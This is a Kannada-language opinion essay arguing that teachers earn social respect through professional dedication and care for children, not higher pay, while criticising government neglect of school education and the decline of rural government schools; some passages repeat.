ವೃತ್ತಿಧರ್ಮ ಪಾಲನೆಯಲ್ಲಿ ಗೌರವ ಪ್ರಾಪ್ತಿ

ಇಂದು ಯಾವುದೇ ಸ್ತರದ ಶಿಕ್ಷಕವೃಂದದ ವೇತನ ಭತ್ಯೆ ಕಡಿಮೆ ಅನ್ನುವಂತಿಲ್ಲ. ಶಿಕ್ಷಕರಾಗುವವರು ಮತ್ತು ಶಿಕ್ಷಕರಾಗಿರುವವರಲ್ಲಿ ವೃತ್ತಿಧರ್ಮ ಆಳವಾಗಿ ಬೇರೂರಿ ಬೆಳಗಬೇಕು. ಇಡೀ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಮಕ್ಕಳು/ವಿದ್ಯಾರ್ಥಿ ಕೇಂದ್ರಿತವಾಗಿ ರೂಪುಗೊಳ್ಳಬೇಕು.

ಶಿಕ್ಷಕ ಕೇಂದ್ರಿತ ಪ್ರಶ್ನೆಗಳು ಶಿಕ್ಷಣ ಕೇಂದ್ರಿತ ಪ್ರಶ್ನೆಗಳಾದರೆ ಬಹುಶಃ ಈ ಕುರಿತು ಚರ್ಚೆ ಹೆಚ್ಚು ಅರ್ಥಪೂರ್ಣವಾಗಬಹುದಿತ್ತೇನೊ. ಈ ಹಿಂದೆ ಉನ್ನತ ಶಿಕ್ಷಣದ ಒಳಹೊರಗನ್ನು ಅನಾವರಣಗೊಳಿಸಿದ ‘ಸಮಾಜಮುಖಿ’ ಮತ್ತೆ ಶಿಕ್ಷಣದತ್ತ ದೃಷ್ಟಿ ಹರಿಸಿರುವುದು ಸೂಕ್ತವಾಗಿದೆ. ಇದು ಪ್ರಾಥಮಿಕ, ಮಾಧ್ಯಮಿಕ ಹಂತಕ್ಕೆ ಹೆಚ್ಚು ಅನ್ವಯವಾಗುವ ಚರ್ಚೆ ಎಂದು ನಾನು ಭಾವಿಸುತ್ತೇನೆ.

ಇತ್ತೀಚೆಗೆ ಒಂದು ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಧಾರವಾಡ ಜಿಲ್ಲೆಯ ಓರ್ವ ಶಾಸಕರು ಮಾತನಾಡುತ್ತ ಶಿಕ್ಷಣ ಇಲಾಖೆ ಶಿಕ್ಷಕರ ಇಲಾಖೆಯಾಗಿ ಮಾರ್ಪಟ್ಟಿದೆ. ಅಲ್ಲಿ ಶಿಕ್ಷಕರ ಬೇಕು ಬೇಡಗಳು, ಸಂಬಳ ಸವಲತ್ತುಗಳ ಏರಿಕೆ, ವರ್ಗಾವರ್ಗಿ ವಿಷಯಗಳೇ ಹೆಚ್ಚು ಚರ್ಚೆಗೊಳಗಾಗುತ್ತವೆ. ಶಿಕ್ಷಣ, ಮಕ್ಕಳ ಕೇಂದ್ರಿತ ವಿಷಯಗಳು ಎಂದೂ ಚರ್ಚೆಗೆ ಒಳಗೊಳ್ಳುವುದೇ ಇಲ್ಲ. ಶಿಕ್ಷಕರ ಕ್ಷೇತ್ರದ ಪ್ರತಿನಿಧಿಗಳು ಮತ್ತು ಅದೇ ಕ್ಷೇತ್ರದಿಂದ ಆಯ್ಕೆ ಆಗುವ ಪದವೀಧರ ಕ್ಷೇತ್ರಗಳ ಪ್ರತಿನಿಧಿಗಳು ಕೂಡ ತಮ್ಮ ಮತದಾರರಾದ ಶಿಕ್ಷಕರ ಬೇಡಿಕೆಗಳು, ಅವರ ಕುಂದುಕೊರತೆ, ಸೇವಾ ವಿಷಯಗಳ ಕುರಿತು ಗಮನ ಹರಿಸಿದಷ್ಟು ಒಟ್ಟಾರೆ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಸುಧಾರಣೆ, ಬದಲಾವಣೆ, ಅಭಿವೃದ್ಧಿ ಕುರಿತು ಚಿಂತಿಸುವುದಿಲ್ಲ ಎಂಬ ಕಳಕಳಿಯನ್ನು ವ್ಯಕ್ತಪಡಿಸಿದರು.

ನಿಜ, ಯಾವುದೇ ಸರ್ಕಾರಿ ಇಲಾಖೆಯ ನೌಕರರಿಗೆ ಇರದಂತಹ ಪ್ರಾತಿನಿಧ್ಯ ಶಿಕ್ಷಣ ಇಲಾಖೆಯ ಶಿಕ್ಷಕರಿಗೆ ಇದೆ. ಅವರ ಪ್ರತಿನಿಧಿಗಳು ಶಾಸನ ಸಭೆಯಲ್ಲಿ ಇರುತ್ತಾರೆ. ಈ ಶಿಕ್ಷಕರು ಮತ್ತು ಅವರನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಶಾಸಕರಿಗೆ ಮೂಲ, ಮಕ್ಕಳು. ಮಕ್ಕಳಿಂದಾಗಿ ಶಿಕ್ಷಕರು, ಶಿಕ್ಷಕರಿಂದಾಗಿ ಶಿಕ್ಷಕರ ಕ್ಷೇತ್ರ, ಅವರ ಪ್ರತಿನಿಧಿಗಳು ಇತ್ಯಾದಿ. ಶಿಕ್ಷಣ ಇಲಾಖೆ ಎಲ್ಲ ಸ್ತರದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಹೊಂದಿರುವ ಮಹತ್ವದ ದೊಡ್ಡ ಇಲಾಖೆ. ಅಲ್ಲಿನ ಸಮಸ್ಯೆಗಳು ಸಂಕೀರ್ಣ. ತುಂಬ ಜವಾಬ್ದಾರಿಯುತವಾದ ಕಾರ್ಯನಿರ್ವಹಣೆಯುಳ್ಳ ಇಲಾಖೆ. ಅದಕ್ಕೆ ಪ್ರಾತಿನಿಧ್ಯ ಅವಶ್ಯಕ ಎಂದು ಮನಗಂಡು ಶಾಸನ ಸಭೆಯಲ್ಲಿ ಇಲಾಖೆಗೆ ಪ್ರತ್ಯೇಕ ಪ್ರಾತಿನಿಧ್ಯ ಒದಗಿಸಲಾಗಿದೆ.

ಅಂತೆಯೇ ಪ್ರಾಥಮಿಕ, ಪ್ರೌಢ ಶಿಕ್ಷಣ ಇಲಾಖೆಗೆ ಸಚಿವರನ್ನು ನೇಮಿಸದೆ ಹಾಗೂ ಒಲ್ಲದ ಮನಸ್ಸಿನ, ಉನ್ನತ ಶಿಕ್ಷಣದ ಒಳಹೊರಗು ಗೊತ್ತಿರದ ಶಾಸಕರನ್ನು ಉನ್ನತ ಶಿಕ್ಷಣ ಸಚಿವರನ್ನಾಗಿ ನೇಮಿಸಿ ಹಿಂದಿನ ಸರ್ಕಾರ ಕಾಲ ತಳ್ಳಿತು.

ಆದರೆ ವಾಸ್ತವವಾಗಿ ಆಗುತ್ತಿರುವುದೇನು. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಎಲ್ಲ ಸಮಸ್ಯೆಗಳು ಈ ಪ್ರಾತಿನಿಧ್ಯದ ಮೂಲಕ ಪರಿಹಾರ ಹೊಂದುತ್ತಿವೆಯೇ? ಅದರಲ್ಲೂ ಪ್ರಾಥಮಿಕ, ಮಾಧ್ಯಮಿಕ ಹಂತದ ಶಿಕ್ಷಣದ ಗೋಜಲುಗಳು ಬಗೆಹರಿಯುತ್ತಿವೆಯೆ ಎಂದರೆ ‘ಇಲ್ಲ’ ಎಂದೇ ಹೇಳಬೇಕು. ಶಾಸನಸಭೆಗಳಲ್ಲಿ ಸರ್ಕಾರದ ಅತೀ ದೊಡ್ಡ ಇಲಾಖೆಯಾದ ಶಿಕ್ಷಣ ಇಲಾಖೆ ಕುರಿತು ಚರ್ಚೆ ಅತ್ಯಲ್ಪ ಎಂದೇ ಹೇಳಬೇಕು. ಶಿಕ್ಷಣ ನೀತಿ, ಶಿಕ್ಷಣ ಮಾಧ್ಯಮ, ಗುಣಮಟ್ಟ ಕುರಿತು ಚರ್ಚೆಗಳು ನಡೆದದ್ದೇ ಇಲ್ಲ. ಶಿಕ್ಷಕರ ಸೌಲಭ್ಯ, ಸವಲತ್ತು, ವರ್ಗಾವಣೆಗಳ ಕುರಿತು ಆಗಾಗ ಅಷ್ಟಿಷ್ಟು ಚರ್ಚೆಗಳು ನಡೆದಿರಬಹುದು. ಆದರೆ ಮಕ್ಕಳ ಕೇಂದ್ರಿತ ಚರ್ಚೆಗಳು ನಡೆಯುವುದೇ ಇಲ್ಲವೆಂದು ಹೇಳಿದರೆ ತಪ್ಪಾಗದು.

ಸರ್ಕಾರ ಕೂಡ ಶಿಕ್ಷಣ, ಶಿಕ್ಷಣ ಇಲಾಖೆಗೆ ನೀಡುವ ಆದ್ಯತೆ ಕೊನೆಯದು. ಅಂತೆಯೇ ಪ್ರಾಥಮಿಕ, ಪ್ರೌಢ ಶಿಕ್ಷಣ ಇಲಾಖೆಗೆ ಸಚಿವರನ್ನು ನೇಮಿಸದೆ ಹಾಗೂ ಒಲ್ಲದ ಮನಸ್ಸಿನ, ಉನ್ನತ ಶಿಕ್ಷಣದ ಒಳಹೊರಗು ಗೊತ್ತಿರದ ಶಾಸಕರನ್ನು ಉನ್ನತ ಶಿಕ್ಷಣ ಸಚಿವರನ್ನಾಗಿ ನೇಮಿಸಿ ಹಿಂದಿನ ಸರ್ಕಾರ ಕಾಲ ತಳ್ಳಿತು. ಸರ್ಕಾರವೇ ಈ ರೀತಿ ಶಿಕ್ಷಣ ರಂಗವನ್ನು ಉಪೇಕ್ಷಿಸಿದರೆ ಶಿಕ್ಷಣ ಇಲಾಖೆಗಾಗಲಿ, ಶಿಕ್ಷಕರಿಗಾಗಲಿ ಗೌರವ ಎಲ್ಲಿಂದ ಬರಬೇಕು, ಹೇಗೆ ಬರಬೇಕು. ಸರ್ಕಾರದ ಆದ್ಯತೆಗಳು ಬೇರೆಯೇ ಇರುತ್ತವೆ.

ನಮ್ಮಲ್ಲಿ ಸಮಾನ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ, ಸಮಾನ ಶಾಲಾ ವ್ಯವಸ್ಥೆ ಇಲ್ಲ. ಉಳ್ಳವರಿಗೊಂದು, ಬಡವರಿಗೊಂದು ಶಾಲಾ ವ್ಯವಸ್ಥೆ ದೇಶದ ತುಂಬೆಲ್ಲ ಈಗ ಪ್ರಚಲಿತದಲ್ಲಿದೆ. ಇದು ಉಳ್ಳವರು ಇತರರ ಮಧ್ಯೆ ದೊಡ್ಡ ಕಂದಕವನ್ನೇ ನಿರ್ಮಿಸಿದೆ. 40-50 ವರ್ಷಗಳ ಹಿಂದೆ ಬಹುತೇಕ ಸರ್ಕಾರಿ ಶಾಲಾ ವ್ಯವಸ್ಥೆಯೇ ಸಮಾಜದ ಎಲ್ಲ ಸ್ತರದ ಮಕ್ಕಳಿಗೆ ಶಿಕ್ಷಣ ನೀಡುತ್ತಿದ್ದವು. ಕಾಲಕಳೆದಂತೆ ಖಾಸಗಿ ಶಾಲೆಗಳ ಸಂಖ್ಯೆ ಹೆಚ್ಚುತ್ತ ಬಂದವು. ಅದರೊಂದಿಗೆ ಆಂಗ್ಲ ಮಾಧ್ಯಮದ ಕಡೆ ಪಾಲಕರ ಒಲವಿನಿಂದಾಗಿ ಈಗ ಸರ್ಕಾರಿ ಶಾಲೆಗಳು ಮತ್ತು ಅನುದಾನಿತ, ಅನುದಾನರಹಿತ ಶಾಲೆಗಳಲ್ಲಿ ಮಕ್ಕಳ ಸಂಖ್ಯೆ ಸರಿಸಮ ಮಟ್ಟಕ್ಕೆ ಬಂದಿದೆ.

ಸರ್ಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಮಕ್ಕಳ ಕಲಿಕೆ ಸಮರ್ಪಕವಾಗಿ ಆಗುತ್ತಿಲ್ಲ ಎಂಬ ಪಾಲಕರ ಅಳಲು, ಹಾಗೂ ಆಂಗ್ಲ ಮಾಧ್ಯಮದ ಕಡೆ ಪಾಲಕರ ಒಲವು. ಕಲಿಕಾ ಮಾಧ್ಯಮದ ಸಮಸ್ಯೆ ಪ್ರತ್ಯೇಕ ವಿಷಯವೆ.

ಪ್ರತಿವರ್ಷ ಸರ್ಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿನ ಮಕ್ಕಳ ಸಂಖ್ಯೆ ನಮ್ಮ ರಾಜ್ಯದಲ್ಲಿ ಸುಮಾರು ಎರಡುವರೆ ಲಕ್ಷದಷ್ಟು ಕಡಿಮೆ ಆಗುತ್ತಿದೆ. ಇದಕ್ಕೆ ಕಾರಣ ಒಂದು, ಸರ್ಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಮಕ್ಕಳ ಕಲಿಕೆ ಸಮರ್ಪಕವಾಗಿ ಆಗುತ್ತಿಲ್ಲ ಎಂಬ ಪಾಲಕರ ಅಳಲು, ಹಾಗೂ ಆಂಗ್ಲ ಮಾಧ್ಯಮದ ಕಡೆ ಪಾಲಕರ ಒಲವು. ಕಲಿಕಾ ಮಾಧ್ಯಮದ ಸಮಸ್ಯೆ ಪ್ರತ್ಯೇಕ ವಿಷಯವೆ. ತಮ್ಮ ಮಕ್ಕಳಿಗೆ ಸರಿಯಾದ ಬೋಧನೆ ಮಾಡದ, ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣ ನೀಡದ ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಸಮಾಜ ಹೇಗೆ ಗೌರವವನ್ನು ನೀಡುತ್ತದೆ?

ಮೂರ್ನಾಲ್ಕು ದಶಕಗಳ ಹಿಂದೆ ಗ್ರಾಮೀಣ ಪ್ರದೇಶದ ಶಾಲೆಗಳಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತಿದ್ದ ಶೇ. 90 ರಷ್ಟು ಶಿಕ್ಷಕರು ಆಯಾ ಗ್ರಾಮಗಳಲ್ಲಿಯೇ ವಾಸವಾಗಿದ್ದು, ಹಗಲೂ ರಾತ್ರಿ ಮಕ್ಕಳ ಪಾಠ ಪ್ರವಚನದ ಬಗ್ಗೆ ಗಮನವಹಿಸುತ್ತಿದ್ದರು. ಕಲಿಕೆಯಲ್ಲಿ ಹಿಂದುಳಿದ ಮಕ್ಕಳಿಗೆ ಶಾಲಾ ಅವಧಿಯ ನಂತರವೂ ಯಾವುದೇ ಫಲಾಪೇಕ್ಷೆ ಇಲ್ಲದೆ ಬೋಧನೆ ಮಾಡುತ್ತಿದ್ದರು. ಗ್ರಾಮದ ಸಾಂಸ್ಕೃತಿಕ, ಸಾಮಾಜಿಕ ಕಾರ್ಯಚಟುವಟಿಕೆಗಳ ಅಭಿನ್ನ ಅಂಗವಾಗಿ ಶಿಕ್ಷಕರು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತ ಗ್ರಾಮಸ್ಥರ ಮರ್ಯಾದೆಗೂ ಪಾತ್ರರಾಗಿರುತ್ತಿದ್ದರು. ಗ್ರಾಮದೊಂದಿಗೆ, ಮಕ್ಕಳ ಜತೆ ಶಿಕ್ಷಕರಿಗೆ ಭಾವನಾತ್ಮಕ ನಂಟಿತ್ತು. ಸಂಬಳ, ಸವಲತ್ತುಗಳು ಕಡಿಮೆ ಇದ್ದರೂ ಶಿಕ್ಷಕರು ಅತೀವ ಕಾಳಜಿಯಿಂದ ಮಕ್ಕಳ ಕಲಿಕೆ ಕುರಿತು ಕಾಳಜಿ ವಹಿಸುತ್ತಿದ್ದರು.

ಅಪವಾದಗಳು ಇಲ್ಲದಿಲ್ಲ. ಆದರೆ ಇಂದು ಬಹಳಷ್ಟು ಶಿಕ್ಷಕರಿಗೆ ಶಿಕ್ಷಕ ಹುದ್ದೆ ಅನ್ನುವುದು ವೃತ್ತಿಯಾಗಿದೆ. ಇದು ಪ್ರವೃತ್ತಿಯಾಗಿ ಉಳಿದಿಲ್ಲ. ಅದರ ಪರಿಣಾಮ ಕಳಪೆ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣ.

ಇಂದು ಶೇ. 90 ರಷ್ಟು ಶಿಕ್ಷಕರು ತಾವು ಪಾಠ ಮಾಡುವ ಶಾಲೆಗಳ ಗ್ರಾಮಗಳಲ್ಲಿ ವಾಸವಾಗಿರುವುದಿಲ್ಲ. ಸಮೀಪದ ನಗರ, ಪಟ್ಟಣಗಳಲ್ಲಿ ವಾಸವಾಗಿದ್ದು ಶಾಲಾ ಸಮಯಕ್ಕೆ ಸೀಮಿತವಾಗಿ ಬಂದುಹೋಗಿ ಮಾಡುತ್ತಾರೆ. ಆರ್ಥಿಕ ಸವಲತ್ತುಗಳು ಹೆಚ್ಚಿ, ಸಾರಿಗೆ ಸಂಪರ್ಕ ಸುಲಭವಾಗಿರುವುದರಿಂದ ಮತ್ತು ನಗರವಾಸದ ಆಕರ್ಷಣೆ ಹೆಚ್ಚಿರುವುದರಿಂದ ಗ್ರಾಮಗಳಲ್ಲಿ ವಾಸ ಮಾಡುವ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ ಕಡಿಮೆ ಆಗಿದೆ. ಹೀಗಾಗಿ ಶಿಕ್ಷಕರಿಗೂ ಶಾಲೆಗೂ, ಶಿಕ್ಷಕರಿಗೂ ಮಕ್ಕಳಿಗೂ ಹಾಗೂ ಮಕ್ಕಳ ಪಾಲಕರಿಗೂ ಇದ್ದಂತಹ ಭಾವನಾತ್ಮಕ ನಂಟು ಕಡಿದು ಹೋಗಿದೆ. ಇದಕ್ಕೆ ಅಪವಾದಗಳು ಇಲ್ಲದಿಲ್ಲ. ಆದರೆ ಇಂದು ಬಹಳಷ್ಟು ಶಿಕ್ಷಕರಿಗೆ ಶಿಕ್ಷಕ ಹುದ್ದೆ ಅನ್ನುವುದು ವೃತ್ತಿಯಾಗಿದೆ. ಇದು ಪ್ರವೃತ್ತಿಯಾಗಿ ಉಳಿದಿಲ್ಲ. ಅದರ ಪರಿಣಾಮ ಕಳಪೆ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣ. ಅದರಲ್ಲೂ ಗ್ರಾಮೀಣ ಮಕ್ಕಳು ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣದಿಂದ ವಂಚಿತರಾಗಿ ಉಳಿಯುತ್ತಿದ್ದಾರೆ. ವಿಷಾದನೀಯ ಅಂಶವೆಂದರೆ ಇದಕ್ಕೆ ಯಾರೂ ಹೊಣೆಗಾರರಾಗದಿರುವುದು.

ಮಕ್ಕಳ ಶಿಕ್ಷಣದ ತುಂಬ ಜವಾಬ್ದಾರಿಯುತ ಕಾರ್ಯದ ಅಸಮರ್ಪಕ ಕಾರ್ಯನಿರ್ವಹಣೆಗೆ ಶಿಕ್ಷಕರಿಂದ ಹಿಡಿದು ಮುಖ್ಯಾಧ್ಯಾಪಕರು, ತಾಲ್ಲೂಕು ಅಥವಾ ಜಿಲ್ಲಾ ಶಿಕ್ಷಣದ ಹೊಣೆ ಹೊತ್ತ ಅಧಿಕಾರಿಗಳು ಅಥವಾ ಇಲಾಖಾ ಮುಖ್ಯಸ್ಥರು ಯಾರೂ ಇದಕ್ಕೆ ಜವಾಬ್ದಾರರಾಗುತ್ತಿಲ್ಲ! ಏಕೆಂದರೆ ಹೊಣೆಗಾರಿಕೆ ಹೊರುವ ಅಥವಾ ಹೊಣೆಗಾರಿಕೆ ನಿಗದಿ ಪಡೆಸುವವರ ಮಕ್ಕಳು ಈ ಯಾವ ಶಾಲೆಗಳಲ್ಲೂ ಓದುವುದಿಲ್ಲ. ಹೀಗಾಗಿ ಗ್ರಾಮಾಂತರ ಪ್ರದೇಶದ ಲಕ್ಷಾಂತರ ಮಕ್ಕಳು ವಂಚನೆಗೆ ಒಳಗಾಗುತ್ತಿದ್ದಾರೆ.

ಖಾಸಗಿ ಶಾಲೆಗಳ ಸ್ಥಿತಿ ಹಾಗಾದರೆ, ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಸ್ಥಿತಿ ಮತ್ತೊಂದು ತೆರನಾಗಿದೆ. ಮೇಲೆ ವಿವರಿಸಿದಂತೆ ಶಾಲೆ, ಮಕ್ಕಳು, ಶಿಕ್ಷಕರ ಮಧ್ಯೆ ಭಾವನಾತ್ಮಕ ಬೆಸುಗೆ ಎಂಬುದೇ ಉಳಿದಿಲ್ಲ.

ಶಿಕ್ಷಕರ ಮೇಲೆ ಹೆಚ್ಚುತ್ತಿರುವ ಪಠ್ಯೇತರ ಚಟುವಟಿಕೆಗಳ ಹೊರೆ ಶಾಲೆಗಳಲ್ಲಿ ಕಳಪೆ ಗುಣಮಟ್ಟಕ್ಕೆ ಒಂದು ಕಾರಣ ಎಂದು ಹೇಳಲಾಗುತ್ತದೆ. ಆದರೆ ಅದು ಭಾಗಶಃ ಸತ್ಯ. ಹಲವಾರು ಕಾರಣಗಳಿಂದಾಗಿ ಶಿಕ್ಷಕರೊಳಗೆ ಕ್ಷೀಣಿಸಿರುವ ಶಿಕ್ಷಕಮನೋಧರ್ಮ ಇದಕ್ಕೆಲ್ಲ ಕಾರಣ. ಬೋಧನೆ ಕುರಿತು ಶ್ರದ್ಧೆ, ಮಕ್ಕಳ ಕುರಿತು ಕಾಳಜಿ, ಕಳಕಳಿ ಲೋಪವಾಗಿರುವುದು, ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಘನತೆ, ಗೌರವವನ್ನು ಶಿಕ್ಷಕರು ಕಾಯ್ದುಕೊಳ್ಳದಿರುವುದು, ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನು ನೋಡುವ ದೃಷ್ಟಿಕೋನವನ್ನು ಬದಲಿಸಿದೆ. ಇದು ಎಲ್ಲ ಸ್ತರದ ಶಿಕ್ಷಕರಿಗೂ ಅನ್ವಯಿಸುವ ಮಾತು.

ಇತರ ವೃತ್ತಿಯಂತೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಯೂ ಒಂದು ಎಂಬಂತಾಗಿದೆ. ಇಂದು ಅಪಾರ ಪ್ರಮಾಣದಲ್ಲಿ ತಲೆ ಎತ್ತಿರುವ ಖಾಸಗಿ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಶಿಕ್ಷಣವನ್ನು ವಾಣಿಜ್ಯೀಕರಣಗೊಳಿಸಿವೆ. ಉಳ್ಳವರು ಹೇರಳ ಹಣ ವೆಚ್ಚ ಮಾಡಿ ಅಂಥ ಶಾಲೆಗಳಲ್ಲಿ ತಮ್ಮ ಮಕ್ಕಳನ್ನು ಓದಿಸುತ್ತಿದ್ದಾರೆ. ಆ ಶಾಲೆಗಳಲ್ಲಿನ ಬೋಧನೆ ಕಲಿಕೆ, ಅಂಕಗಳಿಕೆಯ ಆಧಾರದ ಮೇಲೆ ನಿಂತಿದೆ. ಗುರು-ಶಿಷ್ಯ ಸಂಬಂಧ ಅಲ್ಲಿ ಯಾಂತ್ರೀಕರಣಗೊಂಡಿದೆ. ಖಾಸಗಿ ಶಾಲೆಗಳ ಸ್ಥಿತಿ ಹಾಗಾದರೆ, ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಸ್ಥಿತಿ ಮತ್ತೊಂದು ತೆರನಾಗಿದೆ. ಮೇಲೆ ವಿವರಿಸಿದಂತೆ ಶಾಲೆ, ಮಕ್ಕಳು, ಶಿಕ್ಷಕರ ಮಧ್ಯೆ ಭಾವನಾತ್ಮಕ ಬೆಸುಗೆ ಎಂಬುದೇ ಉಳಿದಿಲ್ಲ.

ಇಷ್ಟಾಗಿಯೂ ಗೌರವ, ಮಾನ, ಸನ್ಮಾನ ಎಂಬುದು ಕೇಳಿ ಪಡೆಯುವಂಥದ್ದಲ್ಲ. ಹೈಸ್ಕೂಲುಗಳಲ್ಲಿ ಶಿಕ್ಷಕರಾಗಿ ನಿವೃತ್ತಿಹೊಂದಿರುವ ನನ್ನ ಒಂದಿಬ್ಬರು ಸಹಪಾಠಿ ಸ್ನೇಹಿತರ ಬಳಿಗೆ ಅವರ ಹಳೆಯ ವಿದ್ಯಾರ್ಥಿಗಳು ಆಗಾಗ ಬಂದು ಗೌರವ ಸಲ್ಲಿಸಿ ಹೋಗುವುದು, ಅವರೊಡನೆ ಸತತ ಸಂಪರ್ಕದಲ್ಲಿರುವುದು ನನಗೆ ಗೊತ್ತು. ಆ ವಿದ್ಯಾರ್ಥಿಗಳೆಲ್ಲ ಈಗ ಉನ್ನತ ಹುದ್ದೆಗಳಲ್ಲಿ ದೇಶ ವಿದೇಶಗಳಲ್ಲಿದ್ದಾರೆ. ತಮ್ಮ ತಮ್ಮ ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಶಿಕ್ಷಕರಿಗೆ ಸಲ್ಲುವ ಗೌರವವೇ ಸಮಾಜ ಶಿಕ್ಷಕರಿಗೆ ಸಲ್ಲಿಸುವ ಗೌರವ. ಅದು ಕೇವಲ ಪಠ್ಯದ ಬೋಧನೆಯಿಂದ ಬರುವಂಥದಲ್ಲ. ಪಠ್ಯೇತರ ಚಟುವಟಿಕೆ, ಶಿಕ್ಷಕರ ಒಳ್ಳೆಯ ಹವ್ಯಾಸಗಳ ಪ್ರಭಾವ, ಅವರ ನಡೆನುಡಿ, ವಿದ್ಯಾರ್ಥಿಗಳ ಕುರಿತು ಅವರ ಅಃತಕರಣ ಮುಂತಾದ ಅಂಶಗಳು ಇದಕ್ಕೆ ಕಾರಣವಾಗುತ್ತವೆ, ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಪ್ರಭಾವಿಸುತ್ತವೆ. ಹಿಂದಿನ ಕಾಲದ ಪ್ರಾಥಮಿಕ ಮತ್ತು ಮಾಧ್ಯಮಿಕ ಶಾಲಾ ಶಿಕ್ಷಕರನ್ನು ನಾವು ಸ್ಮರಿಸುವುದು ಆ ಕಾರಣಕ್ಕಾಗಿ.

ಕೊನೆಗೆ ಎಲ್ಲರು ಸಾಧಿಸುವುದು ಅವರ ಪ್ರತಿಭೆ ಪರಿಶ್ರಮಕ್ಕೆ ತಕ್ಕಷ್ಟು ಮಾತ್ರ. ಶೆ. 10-15 ರಷ್ಟು ಪ್ರತಿಭಾವಂತ ಮಕ್ಕಳು ಮಾತ್ರ ತಾವು ಕಂಡ ಕನಸನ್ನು ನನಸು ಮಾಡಿಕೊಳ್ಳುತ್ತಾರೆ. ಒಂದಿಷ್ಟು ಮಕ್ಕಳು ಸತತ ಪರಿಶ್ರಮದ ಮೂಲಕ ಸಮಾಧಾನಕರ ನೆಲೆ ತಲುಪುತ್ತಾರೆ.

ಕಿರಿಯ ಪ್ರಾಥಮಿಕ ಶಾಲೆಯ ಶಿಕ್ಷಕರಾಗಿ, ಮರಾಠಿ ಸಾಹಿತ್ಯದಲ್ಲಿ ಹೆಸರುವಾಸಿಯಾಗಿ, ಮರಾಠಿ ಭಾಷೆಗೆ ಪ್ರಥಮ ಜ್ಞಾನಪೀಠ ಪ್ರಶಸ್ತಿ ತಂದುಕೊಟ್ಟ ವಿ.ಸ.ಖಾಂಡೇಕರರ ಆತ್ಮಚರಿತ್ರೆ, ‘ಒಂದು ಪುಟದ ಕಥೆ’ (ಮನೋಹರ ಗ್ರಂಥಮಾಲೆ) ನೆನಪಾಗುತ್ತದೆ. ಒರ್ವ ಶಿಕ್ಷಕರಾಗಿ ಅವರು ಪಟ್ಟ ಪಾಡು, ಗಳಿಸಿದ ಶಿಷ್ಯಕೋಟಿಯ ಕಥೆ ಅನುಪಮವಾದದ್ದು. ಶಿಕ್ಷಕರಲ್ಲಿಯೇ ತಮ್ಮ ವೃತ್ತಿ ಕುರಿತು ಗೌರವ ಘನತೆ, ಇರದಿದ್ದಲ್ಲಿ ಅದನ್ನು ಅನ್ಯರಿಂದ ನಿರೀಕ್ಷಿಸಲಾಗದು. ಇದು ಇತರ ಎಲ್ಲ ಚಿಕ್ಕ ದೊಡ್ಡ ವೃತ್ತಿಗಳ ಕುರಿತು ಅನ್ವಯಿಸಿ ಹೇಳುವ ಮಾತು. ಶಿಕ್ಷಕರಿಗೆ ಹೆಚ್ಚು ಅನ್ವಯಿಸುವಂಥದ್ದು. ಈಗಲೂ ಅಂಥ ಶಿಕ್ಷಕರು ಇಲ್ಲ ಎಂದಲ್ಲ. ಅಂಥವರ ಸಂಖ್ಯೆ ಕ್ಷೀಣಿಸಿದೆ ಅಷ್ಟೆ.

ಖ್ಯಾತ ವಿದ್ವಾಂಸರಾದ ಎಂ.ಎಂ.ಕಲಬುರ್ಗಿ ಅವರು ತಮ್ಮ ಒಂದು ಲೇಖನದಲ್ಲಿ ಬರೆಯುತ್ತಾರೆ, ವಿಜಾಪುರದ ಕಾಲೇಜಿನಲ್ಲಿ ಕನ್ನಡ ಬೋಧನೆ ಮಾಡುತ್ತಿದ್ದ ಅವರ ಗುರುಗಳಾದ ಬಿ.ಟಿ.ಸಾಸನೂರ ಅವರ ವಿದ್ವತ್‍ಪೂರ್ಣ ಬೋಧನಾ ವಿಧಾನದಿಂದ ಪ್ರಭಾವಿತರಾಗಿ ಅವರು ಆಗಲೇ ಅವರಂತೆ ಕನ್ನಡ ಶಿಕ್ಷಕರಾಗುವ ಕನಸು ಕಂಡು, ಅದರಂತೆ ಕನ್ನಡದ ಉದ್ದಾಮ ಪಂಡಿತರಾಗಿ, ಬೋಧಕರಾಗಿ, ಸಂಶೋಧಕರಾಗಿ ಹೆಸರುವಾಸಿಯಾದರು. ತಮ್ಮ ವಿದ್ಯಾರ್ಥಿಗಳ ಬೆನ್ನು ತಟ್ಟುತ್ತಿದ್ದ ಅವರ ಪರಿ ಅನುಪಮವಾದುದು. ಇಂತಹ ಅನೇಕ ಉದಾಹರಣೆಗಳನ್ನು ನೀಡಬಹುದು. ಶಿಕ್ಷಕರ ಅಕಳಂಕ ನಡೆನುಡಿ ಮಾತ್ರ ಅವರಿಗೆ ಘನತೆ ಗೌರವ ತರಬಲ್ಲದು. ವೇತನ ಭತ್ಯೆ ಏರಿಕೆಯಿಂದ ಅದು ಬರುವಂಥದ್ದಲ್ಲ.

